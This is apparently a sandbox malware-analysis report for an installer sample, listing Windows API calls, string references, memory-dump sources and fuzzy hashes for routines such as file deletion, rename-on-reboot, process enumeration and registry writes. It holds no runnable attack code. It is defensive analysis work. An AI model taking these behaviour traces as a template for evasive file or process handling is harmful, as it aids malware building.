                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                            • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                            • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                            • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                            • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                            • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                            • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                            • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: F$A
                                                                                                                                                                                                                                                                                            • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                            • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                            • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                            • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                            • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                            • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                            • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                            • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                            • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                            • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                            • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                            • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                            • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                            • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                            • String ID: F$N$open
                                                                                                                                                                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                            • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                            • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                            • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                            • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                            • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
